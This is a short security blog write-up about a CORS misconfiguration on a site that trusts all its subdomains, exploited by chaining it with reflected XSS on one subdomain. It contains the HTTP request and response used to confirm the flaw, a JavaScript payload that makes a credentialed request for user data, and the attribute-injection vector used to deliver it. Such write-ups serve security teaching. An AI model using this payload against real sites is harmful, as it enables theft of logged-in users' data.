Fun With CORS Misconfiguration — II

Posted on by admin
Aman Gupta

Hello all again, I hope everything in going well on your ends. Today I will explain further about CORS misconfiguration leading to sensitive information leaks!!!!

If you haven’t read my previous blog, Please do refer the below link:

So this time the web application, vulnerable.com was trusting all its subdomains. Meaning that any subdomain can take the sensitive data, its meaningful because that’s their domain so they can trust their own domain. But the things can go wrong if attacker finds some vulnerability on the subdomain and use it to exploit the CORS misconfiguration.

This time the scenario was like this:

GET /sensitiveData HTTP/1.1
Host: vulnerable.com
Origin: https://example.vulnerable.com

This is the response I received from the server:

HTTP/1.1 200 OK
Access-Control-Allow-Origin: https://example.vulnerable.com
Access-Control-Allow-Credentials: true
...

Now it’s confirmed that the application trusts all its subdomain. The server settings to CORS was something like this:

Access-Control-Allow-Origin: *.vulnerable.com

So to exploit this misconfiguration we can try to find two vulnerabilities on their subdomains:

  1. Cross-Site Scripting on any of the subdomain.
  2. Subdomain takeover: So that we can craft our own JavaScript on that subdomain and can fool the victim.

I tried finding the vulnerabilities on the subdomain and I found reflected XSS on one of their subdomain, say: https://test.vulnerable.com.

Now the only thing I need to do is to inject Malicious JavaScript on that subdomain and engage victim to visit that page.

Injecting the following payload into the subdomain where XSS exists will result to the exploitation of CORS misconfiguration:

function cors(){var xhttp=new XMLHttpRequest();xhttp.onreadystatechange=function(){if (this.readyState ==4&& this.status==200){alert(this.responseText)}};xhttp.open(“GET”, “https://vulnerable.com/auth/user”, true);xhttp.withCredentials=true;xhttp.send();}

So the name parameter in the subdomain was vulnerable and the XSS payload was like:

“ onclick=”[payload]

So it will get injected and CORS misconfiguration exploited successfully.

Thanks for reading.

Feedback and suggestions are most welcome!!

Twitter: https://twitter.com/gupt4j1